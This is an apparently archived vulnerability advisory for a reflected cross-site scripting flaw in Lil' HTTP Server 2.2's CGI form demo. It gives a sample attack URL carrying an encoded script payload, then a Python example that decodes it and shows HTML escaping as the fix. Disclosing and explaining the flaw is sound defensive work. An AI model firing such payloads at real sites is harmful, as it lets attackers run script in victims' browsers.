Lil' HTTP Server 2.2 Cross Site Scripting



EKU-ID: 358 CVE: OSVDB-ID:
Author: expku Published: 2011-05-30 Verified: Verified


Lil' HTTP Server v2.2 Default CGI Form XSS Vulnerability

Description:
Lil' HTTP Server v2.2 comes with some default applications.
One of them, the "CGI Form Demo" application, allows you to submit your name and e-mail. There is an XSS vulnerability in the submit application.

Sample:
http://192.168.1.102/pbcgi.cgi?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E
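
The mitigation for this kind of reflection is to HTML-encode the submitted value before writing it into the response. The following is an added example, not code from Lil' HTTP Server or from the original advisory: it decodes the sample request above and renders the value with and without encoding. `TEMPLATE` and the function names are assumptions, since the page does not show the demo's real markup.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Sample request copied from the advisory.
SAMPLE_URL = ("http://192.168.1.102/pbcgi.cgi?name="
              "%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E")

# Hypothetical response template (assumption): the real demo's HTML is not on the page.
TEMPLATE = "<html><body><p>Thank you, {name}</p></body></html>"


def form_value(url, field):
    """Return the percent-decoded value of one query-string field ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(field, [""])[0]


def render_unsafe(name):
    """Writes the value into the page verbatim: the behaviour the advisory reports."""
    return TEMPLATE.format(name=name)


def render_safe(name):
    """Encodes &, <, >, " and ' so the browser treats the value as text, not markup."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


if __name__ == "__main__":
    value = form_value(SAMPLE_URL, "name")
    print("decoded :", value)
    print("unsafe  :", render_unsafe(value))
    print("encoded :", render_safe(value))
```

The same encoding has to be applied to every field the form echoes back, including the e-mail field.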

References:

- http://treasuresec.com [Treasure's Security Blog]
- http://www.summitcn.com/lilhttp/lildocs.html
- http://en.wikipedia.org/wiki/Cross-site_scripting